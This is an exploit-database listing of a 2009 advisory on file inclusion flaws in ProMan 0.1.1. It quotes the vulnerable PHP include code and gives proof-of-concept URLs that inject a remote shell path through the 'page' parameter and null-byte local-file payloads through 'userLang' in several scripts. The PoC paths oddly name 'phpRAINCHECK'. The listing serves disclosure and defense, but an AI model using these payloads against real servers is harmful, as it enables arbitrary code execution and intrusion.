header-logo
Suggest Exploit
vendor:
ProMan
by:
cr4wl3r
8,8
CVSS
HIGH
Remote File Inclusion (RFI) and Local File Inclusion (LFI)
98
CWE
Product Name: ProMan
Affected Version From: 0.1.1
Affected Version To: 0.1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:pman:proman
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ProMan <= 0.1.1 Multiple File Include Vulnerability

ProMan is vulnerable to Remote File Inclusion (RFI) and Local File Inclusion (LFI) attacks. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'page' parameter of '_center.php' and 'userLang' parameter of 'elisttasks.php', 'managepmanagers.php', 'manageusers.php', 'helpfunc.php', 'managegroups.php', 'manageprocess.php', 'manageusersgroups.php' and other files. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. Sanitize user-supplied input to prevent malicious code execution.
Source

Exploit-DB raw data:

##############################################################
##ProMan  <= 0.1.1 Multiple File Include Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
Download: http://sourceforge.net/projects/pman/files/
##############################################################
[RFI Code]

<?php
                    if (!($_GET['page']))
                    	include('info.php');
                    else    
                        include $_GET['page'].'.php'; 
                ?>

[LFI Code]

include_once('lang/'.$_SESSION['userLang'].'/elisttasks.php');
if (!defined('PROMAN'))
 	pexit ($l['no hack']); 
##############################################################
PoC RFI:
 [phpRAINCHECK_path]/_center.php?page=[Shell]
##############################################################
PoC LFI:
 [phpRAINCHECK_path]/elisttasks.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/managepmanagers.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/manageusers.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/helpfunc.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/managegroups.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/manageprocess.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/manageusersgroups.php?_SESSION[userLang]=[LFI%00]

others...
##############################################################

Navigation

Suggest Exploit

Services By CQR